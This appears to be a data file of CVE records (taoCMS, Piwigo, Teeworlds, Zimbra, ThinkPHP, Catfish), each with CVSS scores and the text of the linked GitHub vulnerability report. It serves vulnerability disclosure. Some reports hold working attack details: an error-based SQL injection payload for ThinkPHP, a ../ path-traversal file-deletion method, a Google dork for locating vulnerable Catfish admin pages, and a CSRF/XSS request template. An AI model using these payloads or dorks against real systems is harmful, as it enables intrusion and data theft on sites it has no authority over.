[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/taogogo/taocms/issues/12
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "taogogo", "taocms" ]
1.The location of the vulnerability is in taocms\include\Model\file.php from line 60 to line 72 and line 64 to determine whether the incoming folder is empty. Delete the empty folder. If it is not empty, it will not be deleted, but the incoming folder will not be deleted. File filtering.. And / although it is not possible to delete non-empty folders, but you can delete any file ![image](https://user-images.githubusercontent.com/44251830/145678633-2d07350e-bdad-4d22-b087-60fbf5b9c1c2.png) 2.Create a new file on disk d to delete it ![image](https://user-images.githubusercontent.com/44251830/145678650-9b5b7552-ac05-49e4-b083-877882ac985d.png) 3.Enter the background to find the file management function and find a file to delete ![image](https://user-images.githubusercontent.com/44251830/145678660-e547b98d-8b47-4447-9e70-e1bfad430238.png) ![image](https://user-images.githubusercontent.com/44251830/145678670-de581239-bba3-44b0-b5c1-1eefe441cd0e.png) 4.1.txt in the D drive directory and successfully deleted, it proves that you can indeed use ../ to jump to the directory to operate any file, but you need to pay attention to the folder can only delete empty folders ![image](https://user-images.githubusercontent.com/44251830/145678699-ae2faa88-6fc7-42ef-a223-6bda8ef8e11b.png)
exist is an arbitrary file delete vulnerability
https://api.github.com/repos/taogogo/taocms/issues/12/comments
0
2021-12-11T13:39:25Z
2021-12-11T13:39:25Z
https://github.com/taogogo/taocms/issues/12
1,077,540,531
12
2,858
CVE-2021-40882
2021-12-14T18:15:08.490
A Cross Site Scripting (XSS) vulnerability exists in Piwigo 11.5.0 via the system album name and description of the location.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1477" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1477" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:11.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "B6BC6DF8-D938-4413-B4C7-132BCC938E68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Piwigo/Piwigo/issues/1477
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Description: Piwigo system album name and description of the location can be written to XSS code, resulting in persistent cross-site scripting attacks Vulnerable Instances: ![image](https://user-images.githubusercontent.com/31758618/132280481-c0010337-32be-4359-9b10-8e31c89b0b74.png) ![image](https://user-images.githubusercontent.com/31758618/132280541-939cc6b4-f0de-4f1d-90df-9c89d10c344d.png)
Persistent cross-site scripts in Piwigo system album properties (version: 11.5.0)
https://api.github.com/repos/Piwigo/Piwigo/issues/1477/comments
1
2021-09-07T03:39:07Z
2021-12-21T10:02:22Z
https://github.com/Piwigo/Piwigo/issues/1477
989,561,835
1,477
2,859
CVE-2021-43518
2021-12-15T15:15:10.857
Teeworlds up to and including 0.7.5 is vulnerable to Buffer Overflow. A map parser does not validate m_Channels value coming from a map file, leading to a buffer overflow. A malicious server may offer a specially crafted map that will overwrite client's stack causing denial of service or code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/teeworlds/teeworlds/issues/2981" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JIYZ7EVY6NZBM7FQF6GVUARYO6MKSEAT/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OS2LI2RHQNUKUT3FKWYHRC27PLRWCHMZ/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://mmmds.pl/fuzzing-map-parser-part-1-teeworlds/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/teeworlds/teeworlds/issues/2981" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JIYZ7EVY6NZBM7FQF6GVUARYO6MKSEAT/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OS2LI2RHQNUKUT3FKWYHRC27PLRWCHMZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://mmmds.pl/fuzzing-map-parser-part-1-teeworlds/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:teeworlds:teeworlds:*:*:*:*:*:*:*:*", "matchCriteriaId": "B1524405-ED06-4440-A464-7F33F5871E18", "versionEndExcluding": null, "versionEndIncluding": "0.7.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/teeworlds/teeworlds/issues/2981
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "teeworlds", "teeworlds" ]
The client crashes when an invalid map ([14.map.zip](https://github.com/teeworlds/teeworlds/files/7402713/14.map.zip)) is loaded. Such a map can be delivered to the client by a malicious server. Tested on Ubuntu 20.04 x86_64, Teeworlds version: [f35da54b6f2c5f9fd4bbd4559f887ccf8f8cc526](https://github.com/teeworlds/teeworlds/commit/f35da54b6f2c5f9fd4bbd4559f887ccf8f8cc526) Compilation with ASAN: ``` export CXXFLAGS="-ggdb -O0 -fsanitize=address -fno-omit-frame-pointer" export CFLAGS="-ggdb -O0 -fsanitize=address -fno-omit-frame-pointer" cmake .. make ``` Run and connect to a server that delivers an invalid map: ``` ./teeworlds "connect 127.0.0.1" "gfx_fullscreen 0" "gfx_screen_height 240" "gfx_screen_width 360" [...] ================================================================= ==33805==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffffffd8f78 at pc 0x5555556fae80 bp 0x7ffffffd8e10 sp 0x7ffffffd8e00 WRITE of size 4 at 0x7ffffffd8f78 thread T0 #0 0x5555556fae7f in CMapLayers::LoadEnvPoints(CLayers const*, array<CEnvPoint, allocator_default<CEnvPoint> >&) /home/osboxes/teeworlds/teeworlds-asan/src/game/client/components/maplayers.cpp:184 #1 0x5555556fcf3b in CMapLayers::OnMapLoad() /home/osboxes/teeworlds/teeworlds-asan/src/game/client/components/maplayers.cpp:117 #2 0x555555839981 in CGameClient::OnConnected() /home/osboxes/teeworlds/teeworlds-asan/src/game/client/gameclient.cpp:459 #3 0x5555555f6755 in CClient::ProcessServerPacket(CNetChunk*) /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:1283 #4 0x5555555f91ce in CClient::PumpNetwork() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:1596 #5 0x5555555f9596 in CClient::Update() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:1766 #6 0x5555555fc1f0 in CClient::Run() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:2108 #7 0x5555555d24e5 in main /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:2704 #8 0x7ffff68e10b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #9 0x5555555dc48d in _start (/home/osboxes/teeworlds/teeworlds-asan/build/teeworlds+0x8848d) Address 0x7ffffffd8f78 is located in stack of thread T0 at offset 184 in frame #0 0x5555556f949f in CMapLayers::LoadEnvPoints(CLayers const*, array<CEnvPoint, allocator_default<CEnvPoint> >&) /home/osboxes/teeworlds/teeworlds-asan/src/game/client/components/maplayers.cpp:135 This frame has 5 object(s): [32, 36) 'Start' (line 141) [48, 52) 'Num' (line 141) [64, 68) 'Start' (line 151) [80, 84) 'Num' (line 151) [96, 184) 'p' (line 173) <== Memory access at offset 184 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/osboxes/teeworlds/teeworlds-asan/src/game/client/components/maplayers.cpp:184 in CMapLayers::LoadEnvPoints(CLayers const*, array<CEnvPoint, allocator_default<CEnvPoint> >&) Shadow bytes around the buggy address: 0x10007fff3190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff31a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff31b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff31c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff31d0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 f8 f2 f8 f2 =>0x10007fff31e0: 04 f2 04 f2 00 00 00 00 00 00 00 00 00 00 00[f3] 0x10007fff31f0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff3200: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 0x10007fff3210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 0x10007fff3220: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff3230: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==33805==ABORTING ``` Compilation without ASAN: ``` export CXXFLAGS="-ggdb -O0" export CFLAGS="-ggdb -O0" cmake .. make ``` Run and connect to a server that delivers an invalid map: ``` ./teeworlds "connect 127.0.0.1" "gfx_fullscreen 0" "gfx_screen_height 240" "gfx_screen_width 360" [...] Segmentation fault (core dumped) ```
Stack buffer overflow (write) while loading map in CMapLayers::LoadEnvPoints, maplayers.cpp:184
https://api.github.com/repos/teeworlds/teeworlds/issues/2981/comments
2
2021-10-23T10:33:38Z
2022-02-03T03:17:42Z
https://github.com/teeworlds/teeworlds/issues/2981
1,034,135,845
2,981
2,860
CVE-2020-18984
2021-12-15T23:15:08.693
A reflected cross-site scripting (XSS) vulnerability in the zimbraAdmin/public/secureRequest.jsp component of Zimbra Collaboration 8.8.12 allows unauthenticated attackers to execute arbitrary web scripts or HTML via a host header injection.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/buxu/bug/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/buxu/bug/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.12:-:*:*:*:*:*:*", "matchCriteriaId": "9B49E1CC-2362-4B1A-AED7-B8F857EB0D8C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/buxu/bug/issues/2
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "buxu", "bug" ]
Affected product: Zimbra Collaboration Version testing: 8.8.12 (latest version) Affected function: privated for fixing PoC; privated for fixing
Reflected XSS via Host header injection on Zimbra
https://api.github.com/repos/buxu/bug/issues/2/comments
0
2019-04-05T08:23:35Z
2019-04-08T03:53:32Z
https://github.com/buxu/bug/issues/2
429,637,972
2
2,861
CVE-2020-18985
2021-12-15T23:15:08.740
An issue in /domain/service/.ewell-known/caldav of Zimbra Collaboration 8.8.12 allows attackers to redirect users to any arbitrary website of their choosing.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/buxu/bug/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/buxu/bug/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.12:-:*:*:*:*:*:*", "matchCriteriaId": "9B49E1CC-2362-4B1A-AED7-B8F857EB0D8C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/buxu/bug/issues/3
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "buxu", "bug" ]
Affected product: Zimbra Collaboration Version testing: 8.8.12 (latest version) Affected function: privated for fixing OS: Centos7
Open Redirect vulnerability on Zimbra
https://api.github.com/repos/buxu/bug/issues/3/comments
0
2019-04-05T08:45:33Z
2019-04-08T03:54:11Z
https://github.com/buxu/bug/issues/3
429,646,063
3
2,862
CVE-2021-44350
2021-12-15T23:15:08.810
SQL Injection vulnerability exists in ThinkPHP5 5.0.x <=5.1.22 via the parseOrder function in Builder.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/top-think/framework/issues/2613" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/top-think/framework/issues/2613" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*", "matchCriteriaId": "22602324-FAE5-4999-B781-8BE443979414", "versionEndExcluding": null, "versionEndIncluding": "5.1.22", "versionStartExcluding": null, "versionStartIncluding": "5.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/top-think/framework/issues/2613
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "top-think", "framework" ]
This vulnerability exists in the parseOrder method of the Builder class. Because the program did not filter the data well, it directly spliced the data into SQL statements, which eventually led to SQL injection vulnerability. Version: 5.0.x<=ThinkPHP5<=5.1.22 As an example of 5.0.15, in fact, any version of the parseOrder () method that does not filter the passed parameters is available: Add the following code to index.php ![image](https://user-images.githubusercontent.com/67416400/143794642-a4dc07db-261e-4728-81aa-5c7432a09f03.png) And then our payload looks like this: ?name[name^updatexml(1,concat(0x7,user(),0x7e),1)%23]=1 ^ can also be replaced with -,%,/,&... Let's analyze the formation of vulnerabilities: In the Order method of the Query class, we can see that the data is stored directly in the $this->options['order'] 中。 ![image](https://user-images.githubusercontent.com/67416400/143794867-aa4fe57b-f899-4ce4-a27b-2b51f63915c3.png) Next, the find method of the Connection class calls the Select method of the Builder class to generate the SQL statement ![image](https://user-images.githubusercontent.com/67416400/143795011-19ea85f3-fd75-4789-95eb-31ed27b5103d.png) ![image](https://user-images.githubusercontent.com/67416400/143795154-f455181f-f590-4a42-98e8-2dfd5c46ede6.png) The program directly concatenates the string through the parseKey method to return (, without any filtering, detection, which is also the cause of this SQL injection vulnerability <img width="576" alt="ada15d0309c33e8935ec8dbda3a9ade" src="https://user-images.githubusercontent.com/67416400/143795266-158f303e-2ea6-4e41-91e0-147365c48fe1.png"> Finally, error injection is triggered: ![image](https://user-images.githubusercontent.com/67416400/143795320-905a170a-c5f6-41f8-b527-359bd96d8554.png)
SQL injection vulnerability. Version: 5.0.x<=ThinkPHP5<=5.1.22
https://api.github.com/repos/top-think/framework/issues/2613/comments
0
2021-11-29T01:27:44Z
2021-12-13T00:31:52Z
https://github.com/top-think/framework/issues/2613
1,065,512,666
2,613
2,863
CVE-2021-45017
2021-12-15T23:15:08.857
Cross Site Request Forgery (CSRF) vulnerability exits in Catfish <=6.1.* when you upload an html file containing CSRF on the website that uses a google editor; you can specify the menu url address as your malicious url address in the Add Menu column.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xwlrbh/Catfish/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xwlrbh/Catfish/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:catfish-cms:catfish_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "3D55BDFE-7B82-4AEC-B2A1-CCE125EF99D3", "versionEndExcluding": null, "versionEndIncluding": "6.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/xwlrbh/Catfish/issues/8
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xwlrbh", "Catfish" ]
[Suggested description] Cross Site Request Forgery (CSRF) vulnerability exists incatfish - <=6.3.0. First, you upload an html file containing csrf on the website that uses a google editor, (you only need to search in google: inurl:catfishcms/index.php/admin/Index/addmenu.html and then use the authoity of this When you have background permissions and want to induce other users to perform sensitive operations, you can specify the menu url address as your malicious url address in the Add Menu column [Vulnerability Type] Cross Site Request Forgery (CSRF) [Vendor of Product] https://github.com/xwlrbh/Catfish [Affected Product Code Base] catfish - <=6.3.0 [Affected Component] To find a website that uses this editor, you only need to search in google: inurl:catfishcms/index.php/admin/Index/addmenu.html Because this is the feature file of this editor [Attack Type] Remote [Impact Code execution] true Attackers can use websites trusted by users to perform dangerous operations [Attack Vectors] <title>csrf test</title> // your target url ![image](https://user-images.githubusercontent.com/67416400/145698932-698b7901-5860-45fb-bdbd-08035654ecf3.png) ![image](https://user-images.githubusercontent.com/67416400/145698969-6d6d61bd-443b-4f9d-85ab-b510cdb80d60.png) ![image](https://user-images.githubusercontent.com/67416400/145698960-9323b362-7980-423f-b1d8-6ad01576e561.png)
There is a csrf vulnerability in catfish - <=6.3.0
https://api.github.com/repos/xwlrbh/Catfish/issues/8/comments
0
2021-12-12T03:23:30Z
2021-12-12T03:23:30Z
https://github.com/xwlrbh/Catfish/issues/8
1,077,706,857
8
2,864
CVE-2021-45018
2021-12-15T23:15:08.897
Cross Site Scripting (XSS) vulnerability exists in Catfish <=6.3.0 via a Google search in url:/catfishcms/index.php/admin/Index/addmenu.htmland then the .html file on the website that uses this editor (the file suffix is allowed).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xwlrbh/Catfish/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xwlrbh/Catfish/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:catfish-cms:catfish_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "3D55BDFE-7B82-4AEC-B2A1-CCE125EF99D3", "versionEndExcluding": null, "versionEndIncluding": "6.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xwlrbh/Catfish/issues/9
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xwlrbh", "Catfish" ]
[Suggested description] Cross SIte Scripting (XSS) vulnerability exists in catfish - <=6.3.0. via a Google search inurl:/catfishcms/index.php/admin/Index/addmenu.htmland then the .html file on the website that uses this editor (the file suffix is allowed). [Vulnerability Type] Cross Site Scripting (XSS) [Vendor of Product] https://github.com/xwlrbh/Catfish [Affected Product Code Base] catfish - <=6.3.0. [Affected Component] POST /catfishcms/index.php/admin/Index/addmenu.html HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 ... zidingyi=your xss url [Attack Type] Remote [Impact Code execution] true ![image](https://user-images.githubusercontent.com/67416400/145699069-7fa2b0c7-ba44-4939-a38d-d8b758f9df98.png) ![image](https://user-images.githubusercontent.com/67416400/145699078-3833b584-0a84-4943-b0ca-a61656361e9e.png) ![image](https://user-images.githubusercontent.com/67416400/145699048-41079f88-2c91-4ce8-9c7d-185cbf0498f7.png)
There is a stored xss vulnerability exists in catfish - <=6.3.0.
